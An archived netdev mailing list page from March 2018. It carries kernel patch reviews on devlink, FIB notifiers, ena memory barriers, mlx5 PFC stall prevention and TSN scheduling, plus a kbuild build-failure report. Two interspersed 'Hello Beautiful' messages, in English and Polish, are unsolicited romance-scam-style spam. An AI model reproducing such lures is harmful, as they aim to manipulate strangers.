  netdevsim-objs += \
bpf.o
  endif
 +
 +ifneq ($(CONFIG_NET_DEVLINK),)  
>>>
>>> Hm.  Don't you need MAY_USE_DEVLINK dependency perhaps?  
>>
>> mlxsw uses CONFIG_NET_DEVLINK in its Makefile.
>>
>> MAY_USE_DEVLINK seems to only be used in Kconfig files. Not clear to me
>> why it is needed at all.
> 
> NETDEVSIM=y && DEVLINK=m
> 

ok. I purposely did not add DEVLINK as a dependency to netdevsim to make
the resource controller truly optional. Can add it if you prefer.

Re: [PATCH RFC net-next 7/7] netdevsim: Add simple FIB resource controller via devlink

2018-03-25 Thread David Ahern

On 3/24/18 10:02 AM, Jiri Pirko wrote:
>>>
>>> Wait a second. What do you mean by "per-network namespace"? Devlink
>>> instance is always associated with one physical device. Like an ASIC.
>>>
>>>
 has a net entry, the simplest design is to put it into the namespace of
 the controller. Without it, controlling resource sizes in namespace
 'foobar' has to be done from init_net, which is just wrong.
>>
>> you need to look at how netdevsim creates a device per netdevice.
>
> That means one devlink instance for each netdevsim device, doesn't it?
>

 yes.
>>>
>>> Still not sure how to handle namespaces in devlink. Originally, I
>>> thought it would be okay to leave all devlink instances in init_ns.
>>> Because what happens if you move netdev to another namespace? Should the
>>> devlink move as well? What if you have multiple ports, each in different
>>> namespace. Can user move devlink instance to another namespace? Etc.
>>>
>>
>> The devlink instance is associated with a 'struct device' and those do
>> not change namespaces AFAIK.
> 
> Yeah. But you put devlink instance into namespace according to struct
> net_device. That is mismatch.
> 

New netdevsim netdevice creates a new 'struct device' which creates a
new devlink instance. The namespace the netdev is created in is then
passed to the devlink instance. Yes, the netdev could change namespaces,
but that is something we can easily prevent if it has a devlink instance.

But really, we are way down a tangent with respect to the intent of this
patch set. I am fine with limiting the example resource controller to
just the init_net; this patch set is really aimed at the bigger idea of
allowing a notifier handler to fail route and rule adds.

We can revisit devlink and namespaces another time, along with moving
switch ports to namespaces - a key part of implementing a feature
equivalent to what Cisco calls a VDC [1].

[1]
https://www.cisco.com/c/en/us/products/collateral/switches/nexus-7000-10-slot-switch/White_Paper_Tech_Overview_Virtual_Device_Contexts.html

Re: [PATCH RFC net-next 1/7] net: Fix fib notifer to return errno

2018-03-25 Thread David Ahern

On 3/25/18 2:16 AM, Ido Schimmel wrote:
> On Thu, Mar 22, 2018 at 03:57:51PM -0700, David Ahern wrote:
>> Notifier handlers use notifier_from_errno to convert any potential error
>> to an encoded format. As a consequence the other side, call_fib_notifiers
>> in this case, needs to use notifier_to_errno to return the error from
>> the handler back to its caller.
>>
>> Signed-off-by: David Ahern 
>> ---
>>  net/core/fib_notifier.c | 5 -
>>  1 file changed, 4 insertions(+), 1 deletion(-)
>>
>> diff --git a/net/core/fib_notifier.c b/net/core/fib_notifier.c
>> index 5ace0705a3f9..14ba52ebe8c9 100644
>> --- a/net/core/fib_notifier.c
>> +++ b/net/core/fib_notifier.c
>> @@ -21,8 +21,11 @@ EXPORT_SYMBOL(call_fib_notifier);
>>  int call_fib_notifiers(struct net *net, enum fib_event_type event_type,
>> struct fib_notifier_info *info)
> 
> There's another (less interesting case) - call_fib_notifier(), which is
> used to dump the FIB tables for the caller registering to the
> notification chain.
> 
> For example, if you have a non-default FIB rule in the system and you
> modprobe mlxsw, you'll get a silent failure and routes will not be
> offloaded. On the other hand, I'm not sure we want to fail the module
> loading in such cases.

right. In normal cases the driver is loaded to create the netdevices
long before any networking config is done. So it seems to me the use
case you refer to, some user would have go out of there way to create a
situation where they install config that is not supported by the driver.

> 
> A possible solution is to have the driver emit a warning via extack for
> each route/rule being notified after the abort mechanism was triggered.

extack is not available on module load.

Per past discussions, something you suggested, we need a message for
"out-of-line" cases like this where a driver notifies userspace of a
problem.

RE: [PATCH iproute2-next] rdma: Move RDMA UAPI header file to be under RDMA responsibility

2018-03-25 Thread Steve Wise

> Subject: [PATCH iproute2-next] rdma: Move RDMA UAPI header file to be
> under RDMA responsibility
> 
> From: Leon Romanovsky 
> 
> In iproute2 package, the updates of UAPIs files are performed
> after the needed feature lands in kernel's net-next tree.
> 
> Such development flow created delays to the rdma tool developers,
> who uses rdma-next tree as a basis for their work.
> 
> Move RDMA UAPI file to be under rdma/ folder, so whole responsibility
> of syncing this file will be on them.
> 
> Signed-off-by: Leon Romanovsky 

Reviewed-by: Steve Wise

Re: [PATCH v4 17/17] net: ena: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread okaya


On 2018-03-25 08:06, Belgazal, Netanel wrote:

I think you should either add a parameter to
ena_com_write_sq_doorbell() or add ena_com_write_sq_doorbell_rel().
Right now, you have unused function.


That is true. I got rid of ena_com_write_sq_doorbell_rel.



On 3/20/18, 4:43 AM, "Sinan Kaya"  wrote:

Code includes barrier() followed by writel(). writel() already has 
a

barrier
on some architectures like arm64.

This ends up CPU observing two barriers back to back before 
executing the

register write.

Create a new wrapper function with relaxed write operator. Use the 
new

wrapper when a write is following a barrier().

Since code already has an explicit barrier call, changing writel() 
to

writel_relaxed().

Signed-off-by: Sinan Kaya 
---
 drivers/net/ethernet/amazon/ena/ena_com.c |  6 --
 drivers/net/ethernet/amazon/ena/ena_eth_com.h | 22 
--

 drivers/net/ethernet/amazon/ena/ena_netdev.c  |  4 ++--
 3 files changed, 26 insertions(+), 6 deletions(-)

diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c
b/drivers/net/ethernet/amazon/ena/ena_com.c
index bf2de52..b6e628f 100644
--- a/drivers/net/ethernet/amazon/ena/ena_com.c
+++ b/drivers/net/ethernet/amazon/ena/ena_com.c
@@ -631,7 +631,8 @@ static u32 ena_com_reg_bar_read32(struct
ena_com_dev *ena_dev, u16 offset)
 */
wmb();

-	writel(mmio_read_reg, ena_dev->reg_bar + 
ENA_REGS_MMIO_REG_READ_OFF);

+   writel_relaxed(mmio_read_reg,
+  ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF);

for (i = 0; i < timeout; i++) {
if (read_resp->req_id == mmio_read->seq_num)
@@ -1826,7 +1827,8 @@ void ena_com_aenq_intr_handler(struct
ena_com_dev *dev, void *data)

 	/* write the aenq doorbell after all AENQ descriptors were read 
*/

mb();
-	writel((u32)aenq->head, dev->reg_bar + 
ENA_REGS_AENQ_HEAD_DB_OFF);

+   writel_relaxed((u32)aenq->head,
+  dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF);
 }

 int ena_com_dev_reset(struct ena_com_dev *ena_dev,
diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.h
b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
index 2f76572..09ef7cd 100644
--- a/drivers/net/ethernet/amazon/ena/ena_eth_com.h
+++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
@@ -107,7 +107,8 @@ static inline int
ena_com_sq_empty_space(struct ena_com_io_sq *io_sq)
return io_sq->q_depth - 1 - cnt;
 }

-static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq 
*io_sq)
+static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq 
*io_sq,

+   bool relaxed)
 {
u16 tail;

@@ -116,7 +117,24 @@ static inline int
ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq)
 	pr_debug("write submission queue doorbell for queue: %d tail: 
%d\n",

 io_sq->qid, tail);

-   writel(tail, io_sq->db_addr);
+   if (relaxed)
+   writel_relaxed(tail, io_sq->db_addr);
+   else
+   writel(tail, io_sq->db_addr);
+
+   return 0;
+}
+
+static inline int ena_com_write_sq_doorbell_rel(struct
ena_com_io_sq *io_sq)
+{
+   u16 tail;
+
+   tail = io_sq->tail;
+
+	pr_debug("write submission queue doorbell for queue: %d tail: 
%d\n",

+io_sq->qid, tail);
+
+   writel_relaxed(tail, io_sq->db_addr);

return 0;
 }
diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c
b/drivers/net/ethernet/amazon/ena/ena_netdev.c
index 6975150..0530201 100644
--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
+++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
@@ -556,7 +556,7 @@ static int ena_refill_rx_bufs(struct ena_ring
*rx_ring, u32 num)
 * issue a doorbell
 */
wmb();
-   ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq);
+   ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq, true);
}

rx_ring->next_to_use = next_to_use;
@@ -2151,7 +2151,7 @@ static netdev_tx_t ena_start_xmit(struct
sk_buff *skb, struct net_device *dev)

if (netif_xmit_stopped(txq) || !skb->xmit_more) {
/* trigger the dma engine */
-   ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq);
+   ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq, false);
u64_stats_update_begin(&tx_ring->syncp);
tx_ring->tx_stats.doorbells++;
u64_stats_update_end(&tx_ring->syncp);
--
2.7.4

Re: [PATCH net-next v2 1/2] fs/crashdd: add API to collect hardware dump in second kernel

2018-03-25 Thread kbuild test robot

Hi Rahul,

Thank you for the patch! Perhaps something to improve:

[auto build test WARNING on net-next/master]

url:
https://github.com/0day-ci/linux/commits/Rahul-Lakkireddy/fs-crashdd-add-API-to-collect-hardware-dump-in-second-kernel/20180325-191308
config: i386-randconfig-s0-03251817 (attached as .config)
compiler: gcc-6 (Debian 6.4.0-9) 6.4.0 20171026
reproduce:
# save the attached .config to linux build tree
make ARCH=i386 

All warnings (new ones prefixed by >>):

   In file included from fs//crashdd/crashdd.c:8:0:
   fs//crashdd/crashdd_internal.h:13:23: error: field 'bin_attr' has incomplete 
type
 struct bin_attribute bin_attr; /* Binary dump file's attributes */
  ^~~~
   fs//crashdd/crashdd.c: In function 'crashdd_read':
   fs//crashdd/crashdd.c:19:43: error: dereferencing pointer to incomplete type 
'struct bin_attribute'
 struct crashdd_dump_node *dump = bin_attr->private;
  ^~
   fs//crashdd/crashdd.c: In function 'crashdd_mkdir':
   fs//crashdd/crashdd.c:27:9: error: implicit declaration of function 
'kobject_create_and_add' [-Werror=implicit-function-declaration]
 return kobject_create_and_add(name, crashdd_kobj);
^~
   fs//crashdd/crashdd.c:27:9: warning: return makes pointer from integer 
without a cast [-Wint-conversion]
 return kobject_create_and_add(name, crashdd_kobj);
^~
   fs//crashdd/crashdd.c: In function 'crashdd_add_file':
   fs//crashdd/crashdd.c:39:9: error: implicit declaration of function 
'sysfs_create_bin_file' [-Werror=implicit-function-declaration]
 return sysfs_create_bin_file(kobj, &dump->bin_attr);
^
   fs//crashdd/crashdd.c: In function 'crashdd_rmdir':
   fs//crashdd/crashdd.c:44:2: error: implicit declaration of function 
'kobject_put' [-Werror=implicit-function-declaration]
 kobject_put(kobj);
 ^~~
   In file included from include/linux/kernel.h:10:0,
from include/linux/list.h:9,
from include/linux/preempt.h:11,
from include/linux/spinlock.h:51,
from include/linux/vmalloc.h:5,
from fs//crashdd/crashdd.c:4:
   fs//crashdd/crashdd.c: In function 'crashdd_get_driver':
   fs//crashdd/crashdd.c:101:25: error: dereferencing pointer to incomplete 
type 'struct kobject'
  if (!strcmp(node->kobj->name, name)) {
^
   include/linux/compiler.h:58:30: note: in definition of macro '__trace_if'
 if (__builtin_constant_p(!!(cond)) ? !!(cond) :   \
 ^~~~
>> fs//crashdd/crashdd.c:101:3: note: in expansion of macro 'if'
  if (!strcmp(node->kobj->name, name)) {
  ^~
   fs//crashdd/crashdd.c: In function 'crashdd_init':
   fs//crashdd/crashdd.c:227:51: error: 'kernel_kobj' undeclared (first use in 
this function)
 crashdd_kobj = kobject_create_and_add("crashdd", kernel_kobj);
  ^~~
   fs//crashdd/crashdd.c:227:51: note: each undeclared identifier is reported 
only once for each function it appears in
   fs//crashdd/crashdd.c: In function 'crashdd_add_file':
   fs//crashdd/crashdd.c:40:1: warning: control reaches end of non-void 
function [-Wreturn-type]
}
^
   cc1: some warnings being treated as errors

vim +/if +101 fs//crashdd/crashdd.c

 3  
   > 4  #include 
 5  #include 
 6  #include 
 7  
 8  #include "crashdd_internal.h"
 9  
10  static LIST_HEAD(crashdd_list);
11  static DEFINE_MUTEX(crashdd_mutex);
12  
13  static struct kobject *crashdd_kobj;
14  
15  static ssize_t crashdd_read(struct file *filp, struct kobject *kobj,
16  struct bin_attribute *bin_attr,
17  char *buf, loff_t fpos, size_t count)
18  {
19  struct crashdd_dump_node *dump = bin_attr->private;
20  
21  memcpy(buf, dump->buf + fpos, count);
22  return count;
23  }
24  
25  static struct kobject *crashdd_mkdir(const char *name)
26  {
27  return kobject_create_and_add(name, crashdd_kobj);
28  }
29  
30  static int crashdd_add_file(struct kobject *kobj, const char *name,
31  struct crashdd_dump_node *dump)
32  {
33  dump->bin_attr.attr.name = name;
34  dump->bin_attr.attr.mode = 0444;
35  dump->bin_attr.size = dump->size;
36  dump->bin_attr.read = crashdd_read;
37  dump->bin_attr.priva

Re: [PATCH v4 17/17] net: ena: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread Belgazal, Netanel

I think you should either add a parameter to ena_com_write_sq_doorbell() or add 
ena_com_write_sq_doorbell_rel().
Right now, you have unused function.

On 3/20/18, 4:43 AM, "Sinan Kaya"  wrote:

Code includes barrier() followed by writel(). writel() already has a
barrier
on some architectures like arm64.

This ends up CPU observing two barriers back to back before executing the
register write.

Create a new wrapper function with relaxed write operator. Use the new
wrapper when a write is following a barrier().

Since code already has an explicit barrier call, changing writel() to
writel_relaxed().

Signed-off-by: Sinan Kaya 
---
 drivers/net/ethernet/amazon/ena/ena_com.c |  6 --
 drivers/net/ethernet/amazon/ena/ena_eth_com.h | 22 --
 drivers/net/ethernet/amazon/ena/ena_netdev.c  |  4 ++--
 3 files changed, 26 insertions(+), 6 deletions(-)

diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c 
b/drivers/net/ethernet/amazon/ena/ena_com.c
index bf2de52..b6e628f 100644
--- a/drivers/net/ethernet/amazon/ena/ena_com.c
+++ b/drivers/net/ethernet/amazon/ena/ena_com.c
@@ -631,7 +631,8 @@ static u32 ena_com_reg_bar_read32(struct ena_com_dev 
*ena_dev, u16 offset)
 */
wmb();
 
-   writel(mmio_read_reg, ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF);
+   writel_relaxed(mmio_read_reg,
+  ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF);
 
for (i = 0; i < timeout; i++) {
if (read_resp->req_id == mmio_read->seq_num)
@@ -1826,7 +1827,8 @@ void ena_com_aenq_intr_handler(struct ena_com_dev 
*dev, void *data)
 
/* write the aenq doorbell after all AENQ descriptors were read */
mb();
-   writel((u32)aenq->head, dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF);
+   writel_relaxed((u32)aenq->head,
+  dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF);
 }
 
 int ena_com_dev_reset(struct ena_com_dev *ena_dev,
diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.h 
b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
index 2f76572..09ef7cd 100644
--- a/drivers/net/ethernet/amazon/ena/ena_eth_com.h
+++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
@@ -107,7 +107,8 @@ static inline int ena_com_sq_empty_space(struct 
ena_com_io_sq *io_sq)
return io_sq->q_depth - 1 - cnt;
 }
 
-static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq)
+static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq,
+   bool relaxed)
 {
u16 tail;
 
@@ -116,7 +117,24 @@ static inline int ena_com_write_sq_doorbell(struct 
ena_com_io_sq *io_sq)
pr_debug("write submission queue doorbell for queue: %d tail: %d\n",
 io_sq->qid, tail);
 
-   writel(tail, io_sq->db_addr);
+   if (relaxed)
+   writel_relaxed(tail, io_sq->db_addr);
+   else
+   writel(tail, io_sq->db_addr);
+
+   return 0;
+}
+
+static inline int ena_com_write_sq_doorbell_rel(struct ena_com_io_sq 
*io_sq)
+{
+   u16 tail;
+
+   tail = io_sq->tail;
+
+   pr_debug("write submission queue doorbell for queue: %d tail: %d\n",
+io_sq->qid, tail);
+
+   writel_relaxed(tail, io_sq->db_addr);
 
return 0;
 }
diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c 
b/drivers/net/ethernet/amazon/ena/ena_netdev.c
index 6975150..0530201 100644
--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
+++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
@@ -556,7 +556,7 @@ static int ena_refill_rx_bufs(struct ena_ring *rx_ring, 
u32 num)
 * issue a doorbell
 */
wmb();
-   ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq);
+   ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq, true);
}
 
rx_ring->next_to_use = next_to_use;
@@ -2151,7 +2151,7 @@ static netdev_tx_t ena_start_xmit(struct sk_buff 
*skb, struct net_device *dev)
 
if (netif_xmit_stopped(txq) || !skb->xmit_more) {
/* trigger the dma engine */
-   ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq);
+   ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq, false);
u64_stats_update_begin(&tx_ring->syncp);
tx_ring->tx_stats.doorbells++;
u64_stats_update_end(&tx_ring->syncp);
-- 
2.7.4

Re: [RFC v3 net-next 13/18] net/sched: Introduce the TBS Qdisc

2018-03-25 Thread Thomas Gleixner

On Fri, 23 Mar 2018, Jesus Sanchez-Palencia wrote:
> On 03/22/2018 03:52 PM, Thomas Gleixner wrote:
> > So what's the plan for this? Having TAS as a separate entity or TAS feeding
> > into the proposed 'basic' time transmission thing?
> 
> The second one, I guess.

That's just wrong. It won't work. See below.

> Elaborating, the plan is at some point having TAS as a separate entity,
> but which can use tbs for one of its classes (and cbs for another, and
> strict priority for everything else, etc).
>
> Basically, the design would something along the lines of 'taprio'. A root 
> qdisc
> that is both time and priority aware, and capable of running a schedule for 
> the
> port. That schedule can run inside the kernel with hrtimers, or just be
> offloaded into the controller if Qbv is supported on HW.
> 
> Because it would expose the inner traffic classes in a mq / mqprio / prio 
> style,
> then it would allow for other per-queue qdiscs to be attached to it. On a 
> system
> using the i210, for instance, we could then have tbs installed on traffic 
> class
> 0 just dialing hw offload. The Qbv schedule would be running in SW on the TAS
> entity (i.e. 'taprio') which would be setting the packets' txtime before
> dequeueing packets on a fast path -> tbs -> NIC.
> 
> Similarly, other qdisc, like cbs, could be installed if all that traffic class
> requires is traffic shaping once its 'gate' is allowed to execute the selected
> tx algorithm attached to it.
> 
> > I've not yet seen a convincing argument why this low level stuff with all
> > of its weird flavours is superiour over something which reflects the basic
> > operating principle of TSN.
> 
> 
> As you know, not all TSN systems are designed the same. Take AVB systems, for
> example. These not always are running on networks that are aware of any time
> schedule, or at least not quite like what is described by Qbv.
> 
> On those systems there is usually a certain number of streams with different
> priorities that care mostly about having their bandwidth reserved along the
> network. The applications running on such systems are usually based on AVTP,
> thus they already have to calculate and set the "avtp presentation time"
> per-packet themselves. A Qbv scheduler would probably provide very little
> benefits to this domain, IMHO. For "talkers" of these AVB systems, shaping
> traffic using txtime (i.e. tbs) can provide a low-jitter alternative to cbs, 
> for
> instance.

You're looking at it from particular use cases and try to accomodate for
them in the simplest possible way. I don't think that cuts it.

Let's take a step back and look at it from a more general POV without
trying to make it fit to any of the standards first. I'm deliberately NOT
using any of the standard defined terms.

At the (local) network level you have always an explicit plan. This plan
might range from no plan at all to an very elaborate plan which is strict
about when each node is allowed to TX a particular class of packets.

So lets assume we have the following picture:

  [NIC]
|
 [ Time slice manager ]

Now in the simplest case, the time slice manager has no constraints and
exposes a single input which allows the application to say: "Send my packet
at time X". There is no restriction on 'time X' except if there is a time
collision with an already queued packet or the requested TX time has
already passed. That's close to what you implemented.

  Is the TX timestamp which you defined in the user space ABI a fixed
  scheduling point or is it a deadline?

  That's an important distinction and for this all to work accross various
  use cases you need a way to express that in the ABI. It might be an
  implicit property of the socket/channel to which the application connects
  to but still you want to express it from the application side to do
  proper sanity checking.

  Just think about stuff like audio/video streaming. The point of
  transmission does not have to be fixed if you have some intelligent
  controller at the receiving end which can buffer stuff. The only relevant
  information is the deadline, i.e. the latest point in time where the
  packet needs to go out on the wire in order to keep the stream steady at
  the consumer side. Having the notion of a deadline and that's the only
  thing the provider knows about allows you proper utilization by using an
  approriate scheduling algorithm like EDF.

  Contrary to that you want very explicit TX points for applications like
  automation control. For this kind of use case there is no wiggle room, it
  has to go out at a fixed time because that's the way control systems
  work.

  This is missing right now and you want to get that right from the very
  beginning. Duct taping it on the interface later on is a bad idea.

Now lets go one step further and create two time slices for whatever
purpose still on the single node (not network wide). You want to do that
because you want temporal separat

Hello Beautiful

2018-03-25 Thread Jack

Hi Dear, my name is Jack and i am seeking for a relationship in which i will 
feel loved after a series of failed relationships. 

I am hoping that you would be interested and we could possibly get to know each 
other more if you do not mind. I am open to answering questions from you as i 
think my approach is a little inappropriate. Hope to hear back from you.

Jack.

Re: [net-next 02/15] ethtool: Add support for configuring PFC stall prevention in ethtool

2018-03-25 Thread Gal Pressman

On 24-Mar-18 17:57, Andrew Lunn wrote:
> On Fri, Mar 23, 2018 at 03:39:12PM -0700, Saeed Mahameed wrote:
>> From: Inbar Karmy 
>>
>> In the event where the device unexpectedly becomes unresponsive
>> for a long period of time, flow control mechanism may propagate
>> pause frames which will cause congestion spreading to the entire
>> network.
>> To prevent this scenario, when the device is stalled for a period
>> longer than a pre-configured timeout, flow control mechanisms are
>> automatically disabled.
>>
>> This patch adds support for the ETHTOOL_PFC_STALL_PREVENTION
>> as a tunable.
>> This API provides support for configuring flow control storm prevention
>> timeout (msec).
>>
>> Signed-off-by: Inbar Karmy 
>> Cc: Michal Kubecek 
>> Cc: Andrew Lunn 
>> Signed-off-by: Saeed Mahameed 
>> ---
>>  include/uapi/linux/ethtool.h | 4 
>>  net/core/ethtool.c   | 6 ++
>>  2 files changed, 10 insertions(+)
>>
>> diff --git a/include/uapi/linux/ethtool.h b/include/uapi/linux/ethtool.h
>> index 20da156aaf64..9dc63a14a747 100644
>> --- a/include/uapi/linux/ethtool.h
>> +++ b/include/uapi/linux/ethtool.h
>> @@ -217,10 +217,14 @@ struct ethtool_value {
>>  __u32   data;
>>  };
>>  
>> +#define PFC_STORM_PREVENTION_AUTO   0x
>> +#define PFC_STORM_PREVENTION_DISABLE0
>> +
>>  enum tunable_id {
>>  ETHTOOL_ID_UNSPEC,
>>  ETHTOOL_RX_COPYBREAK,
>>  ETHTOOL_TX_COPYBREAK,
>> +ETHTOOL_PFC_PREVENTION_TOUT,
> 
> Hi Inbar
> 
> Please could you add a comment here about the units. Ideally we want
> this file to be self documenting.

Thank you for the review, we will fix that.

> 
>  Andrew
>

Re: [net-next 03/15] net/mlx5e: PFC stall prevention support

2018-03-25 Thread Gal Pressman

On 24-Mar-18 18:07, Andrew Lunn wrote:
> On Fri, Mar 23, 2018 at 03:39:13PM -0700, Saeed Mahameed wrote:
>> From: Inbar Karmy 
>>
>> Implement set/get functions to configure PFC stall prevention
>> timeout by tunables api through ethtool.
>> By default the stall prevention timeout is configured to 8 sec.
>> Timeout range is: 80-8000 msec.
>> Enabling stall prevention without a specific timeout will set
>> the timeout to 100 msec.
> 
> Hi Inbar
> 
> I think this last sentence should be talking about auto, not without a
> specific timeout.

Hi Andrew,
Good catch, we will fix that.

> 
>>
>> Signed-off-by: Inbar Karmy 
>> Signed-off-by: Saeed Mahameed 
>> ---
>>  .../net/ethernet/mellanox/mlx5/core/en_ethtool.c   | 57 +++
>>  drivers/net/ethernet/mellanox/mlx5/core/port.c | 64 
>> +++---
>>  include/linux/mlx5/mlx5_ifc.h  | 17 --
>>  include/linux/mlx5/port.h  |  6 ++
>>  4 files changed, 132 insertions(+), 12 deletions(-)
>>
>> diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c 
>> b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
>> index cc8048f68f11..62061fd23143 100644
>> --- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
>> +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
>> @@ -1066,6 +1066,57 @@ static int mlx5e_get_rxnfc(struct net_device *netdev,
>>  return err;
>>  }
>>  
>> +#define MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC 100
>> +#define MLX5E_PFC_PREVEN_TOUT_MAX_MSEC  8000
>> +#define MLX5E_PFC_PREVEN_MINOR_PRECENT  85
>> +#define MLX5E_PFC_PREVEN_TOUT_MIN_MSEC  80
>> +#define MLX5E_DEVICE_STALL_MINOR_WATERMARK(critical_tout) \
>> +max_t(u16, MLX5E_PFC_PREVEN_TOUT_MIN_MSEC, \
>> +  (critical_tout * MLX5E_PFC_PREVEN_MINOR_PRECENT) / 100)
>> +
>> +static int mlx5e_get_pfc_prevention_tout(struct net_device *netdev,
>> + u16 *pfc_prevention_tout)
>> +{
>> +struct mlx5e_priv *priv= netdev_priv(netdev);
>> +struct mlx5_core_dev *mdev = priv->mdev;
>> +
>> +if (!MLX5_CAP_PCAM_FEATURE((priv)->mdev, pfcc_mask) ||
>> +!MLX5_CAP_DEBUG((priv)->mdev, stall_detect))
>> +return -EOPNOTSUPP;
>> +
>> +return mlx5_query_port_stall_watermark(mdev, pfc_prevention_tout, NULL);
> 
> Shouldn't you map a value of MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC back to 
> PFC_STORM_PREVENTION_AUTO?

We discussed this point internally, mapping MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC 
(100) to
PFC_STORM_PREVENTION_AUTO might cause confusion when the user explicitly asks 
for 100msec timeout
and gets auto in his following query.
Also, this way the "auto" timeout is visible to the user, which might help him 
get an initial
clue of which values are recommended.

> 
>   Andrew
>

Hello Beautiful

2018-03-25 Thread Jack

Cześć Drogi, nazywam się Jack i szukam związku, w którym będę czuć się kochany 
po serii nieudanych związków.

Mam nadzieję, że byłbyś zainteresowany i moglibyśmy się lepiej poznać, jeśli 
nie masz nic przeciwko. Jestem otwarty na udzielanie odpowiedzi na pytania od 
ciebie, ponieważ uważam, że moje podejście jest trochę niewłaściwe. Mam 
nadzieję, że odezwę się od ciebie.

Jacek.

1 2 >

1 - 100 of 103 matches

Mail list logo